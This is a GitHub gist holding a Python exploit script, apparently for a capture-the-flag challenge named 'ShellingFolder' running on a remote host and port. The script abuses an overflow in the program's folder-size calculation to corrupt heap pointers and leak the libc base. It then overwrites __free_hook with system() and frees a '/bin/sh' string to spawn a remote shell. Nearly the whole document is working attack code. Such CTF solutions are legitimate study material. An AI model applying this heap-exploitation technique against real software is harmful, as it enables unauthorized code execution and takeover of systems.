Created
October 11, 2016 16:23
-
-
Save peternguyen93/937e07d44ba1f7e8e64ff5b4ba582890 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from Pwn import * | |
| p = Pwn(mode=1,host='52.69.237.212',port=4869) | |
| def make_folder(folder_name): | |
| p.read_until('Your choice:') | |
| p.sendint(3) | |
| p.read_until('Name of Folder:') | |
| p.sendline(folder_name) | |
| def create_file_in_current_folder(file_name,size): | |
| p.read_until('Your choice:') | |
| p.sendint(4) | |
| p.read_until('Name of File:') | |
| p.sendline(file_name) | |
| p.read_until('Size of File:') | |
| p.sendint(size) | |
| def del_file_folder_in_current_dir(file_folder): | |
| p.read_until('Your choice:') | |
| p.sendint(5) | |
| p.read_until('Choose a Folder or file :') | |
| p.sendline(file_folder) | |
| def change_current_folder(new_root_dir): | |
| p.read_until('Your choice:') | |
| p.sendint(2) | |
| p.read_until('Choose a Folder :') | |
| p.sendline(new_root_dir) | |
| def list_current_folder(): | |
| p.read_until('Your choice:') | |
| p.sendint(1) | |
| return p.read_until('ShellingFolder') | |
| def calc_size_of_current_folder(): | |
| p.read_until('Your choice:') | |
| p.sendint(6) | |
| return p.read_until('ShellingFolder') | |
| def exploit(): | |
| p.connect() | |
| raw_input('>') | |
| # this bug is stack overflow in calc_size_of_current_folder | |
| # allow attacker can overwrite cur_folder->size address | |
| # so attacker can modify address in heap and perform exploitation. | |
| # overwrite cur_folder->folder_or_file[0] = cur_folder->folder_or_file[0] + offset | |
| # point this pointer to itself | |
| make_folder('PWN') | |
| create_file_in_current_folder('B'*24 + '\x10',0x120) | |
| create_file_in_current_folder('C'*24,0x1337) | |
| create_file_in_current_folder('D'*24,0x1337) | |
| # overwrite msb cur_folder->child_node[0] point to root_folder | |
| calc_size_of_current_folder() | |
| del_file_folder_in_current_dir('B'*24 + '\x10') | |
| del_file_folder_in_current_dir('C'*24) | |
| # make &(cur_folder->child_node[0]) - 88 to leak libc base | |
| create_file_in_current_folder('B'*24 + '\x20',-88) | |
| calc_size_of_current_folder() | |
| leak = list_current_folder() | |
| off = leak.find('\x7f') | |
| leak = p.unpack(leak[off - 5:off + 1].ljust(8,'\x00')) | |
| libc_base = leak - 0x3c3b78 | |
| libc_free_hook = libc_base + 0x3c57a8 | |
| system = libc_base + 0x45380 | |
| print '[+] Libc base :',hex(libc_base) | |
| print '[+] free_hook :',hex(libc_free_hook) | |
| print '[+] system() :',hex(system) | |
| del_file_folder_in_current_dir('D'*24) | |
| del_file_folder_in_current_dir('B'*24 + '\x20') # del it | |
| create_file_in_current_folder('/bin/sh',0x1337) | |
| # make cur_folder->child_node[1] to /bin/sh | |
| create_file_in_current_folder('B'*24 + '\x20',0x20) | |
| calc_size_of_current_folder() | |
| del_file_folder_in_current_dir('B'*24 + '\x20') | |
| # overwrite libc_free_hook | |
| stage = 'X'*24 + p.pack(libc_free_hook)[:-2] | |
| # overwrite free_hook = system first 4 bytes | |
| create_file_in_current_folder(stage,system) | |
| # overwrite last 2 bytes | |
| stage = 'X'*24 + p.pack(libc_free_hook + 4)[:-2] | |
| create_file_in_current_folder(stage,system >> 32) # overwrite free_hook = system | |
| calc_size_of_current_folder() | |
| del_file_folder_in_current_dir('\x00') | |
| p.io() | |
| exploit() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment